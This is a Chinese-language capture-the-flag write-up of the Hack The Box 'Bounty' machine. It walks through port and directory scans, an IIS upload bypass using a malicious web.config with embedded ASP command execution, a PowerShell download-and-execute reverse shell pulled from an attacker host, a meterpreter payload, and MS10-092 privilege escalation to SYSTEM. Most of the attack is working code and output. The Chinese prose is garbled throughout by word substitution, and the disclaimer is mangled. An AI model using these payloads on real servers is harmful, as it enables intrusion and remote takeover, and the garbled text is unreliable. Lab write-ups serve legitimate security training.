共计 8456 个字符,预计需要花费 22 分钟才能阅读完成。
免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
┌──(root💀kali)-[~/htb/Bounty]
└─# nmap -sV -Pn 10.10.10.93 -p- 1 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-12-16 22:37 EST
Nmap scan report for 10.10.10.93
Host is up (0.27s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 360.04 seconds
目录爆破
└─# gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -x aspx
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.93
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/16 22:44:15 Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx (Status: 200)
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
===============================================================
2021/12/16 22:46:25 Finished
===============================================================
transfer.aspx 是一个文件上传页面
所有胜利上传的文件都会到 uploadedfiles 下,不过这个目录下的文件过一段时间(几十秒)就会被删除
应用 burpsuite,截断上传页面信息,应用 intruder,爆破扩展名,发现容许上传的扩展名包含:gif,jpg,png,config
查了下 IIS7.5 下有一个畸形解析破绽,然而如同无奈复现
试过传图片码,各种截断,然而如同无奈绕过
在谷歌上搜寻IIS httpd 7.5 upload rce
找到了这篇文章
能够上传一个 web.config 文件,在正文里执行 asp 代码
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ipconfig")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>
下面文件上传当前拜访 http://10.10.10.93/uploadedfiles/web.config 胜利打印 ipconfig 命令
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.93
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
上面咱们筹备一个反弹 shell,把 github 上的这个脚本下载到本地,并且在脚本最下方退出一行代码:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 4242
把 web.config 编辑成以下 payload
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.3/Invoke-PowerShellTcp.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>
在本地开启一个 http 服务,筹备传送Invoke-PowerShellTcp.ps1
python3 -m http.server 80
kali 开启监听接管反弹 shell
nc -lnvp 4242
上传当前,关上 http://10.10.10.93/uploadedfiles/web.config 页面,拿到初始 shell
┌──(root💀kali)-[~/htb/Bounty]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
拿到了初始 shell
然而无奈找到 user.txt
提权
webshell 不太稳固,咱们编译一个稳固的 meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > shell64.exe
在靶机顺次执行上面两行代码,把 shell 下载到靶机
$client = new-object System.Net.WebClient
$client.DownloadFile(‘http://10.10.14.3:8000/shell6…’, ‘C:\users\merlin\Desktop\shell64.exe’)
powershell 执行 exe 文件
&”C:\users\merlin\Desktop\shell64.exe”
拿到 meterpreter 当前,把 winPEAS.bat 传到靶机,枚举提权破绽
"Microsoft Windows Server 2008 R2 Datacenter"
[i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat)
MS11-080 patch is NOT installed XP/SP3,2K3/SP3-afd.sys)
MS16-032 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
MS11-011 patch is NOT installed XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
MS10-59 patch is NOT installed 2K8,Vista,7/SP0-Chimichurri)
MS10-21 patch is NOT installed 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)
MS10-092 patch is NOT installed 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)
MS10-073 patch is NOT installed XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)
MS17-017 patch is NOT installed 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)
MS10-015 patch is NOT installed 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)
MS08-025 patch is NOT installed 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)
MS06-049 patch is NOT installed 2K/SP4-ZwQuerySysInfo)
MS06-030 patch is NOT installed 2K,XP/SP2-Mrxsmb.sys)
MS05-055 patch is NOT installed 2K/SP4-APC Data-Free)
MS05-018 patch is NOT installed 2K/SP3/4,XP/SP1/2-CSRSS)
MS04-019 patch is NOT installed 2K/SP2/3/4-Utility Manager)
MS04-011 patch is NOT installed 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)
MS04-020 patch is NOT installed 2K/SP4-POSIX)
MS14-040 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)
MS16-016 patch is NOT installed 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)
MS15-051 patch is NOT installed 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)
MS14-070 patch is NOT installed 2K3/SP2-TCP/IP)
MS13-005 patch is NOT installed Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)
MS13-053 patch is NOT installed 7SP0/SP1_x86-schlamperei)
MS13-081 patch is NOT installed 7SP0/SP1_x86-track_popup_menu) 能够看见靶机很多补丁没有装置,一一枚举,应用 MS10-092
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > search MS10-092
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms10_092_schelevator
提权
msf6 exploit(windows/local/ms10_092_schelevator) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Preparing payload at C:\Windows\TEMP\AoTizOUxSB.exe
[*] Creating task: LXJM4TwyEqICqyv
[*] SUCCESS: The scheduled task "LXJM4TwyEqICqyv" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\LXJM4TwyEqICqyv...
[*] Original CRC32: 0x866f314a
[*] Final CRC32: 0x866f314a
[*] Writing our modified content back...
[*] Validating task: LXJM4TwyEqICqyv
[*]
[*] Folder: \
[*] TaskName Next Run Time Status
[*] ======================================== ====================== ===============
[*] LXJM4TwyEqICqyv 1/1/2022 5:38:00 AM Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "LXJM4TwyEqICqyv" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "LXJM4TwyEqICqyv" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (175174 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "LXJM4TwyEqICqyv".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.3:4444 -> 10.10.10.93:49175) at 2021-12-20 22:38:40 -0500
[*] SUCCESS: The scheduled task "LXJM4TwyEqICqyv" was successfully deleted.
[*] SCHELEVATOR
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
曾经拿到 SYSTEM 权限,至此咱们能够读取零碎内任何文件。
user.txt 在普通用户权限下无奈查看到,然而在 system 下是能够的。
meterpreter > search -f user.txt
Found 1 result...
c:\Users\merlin\Desktop\user.txt (32 bytes)
meterpreter > search -f root.txt
Found 1 result...
c:\Users\Administrator\Desktop\root.txt (32 bytes)
正文完
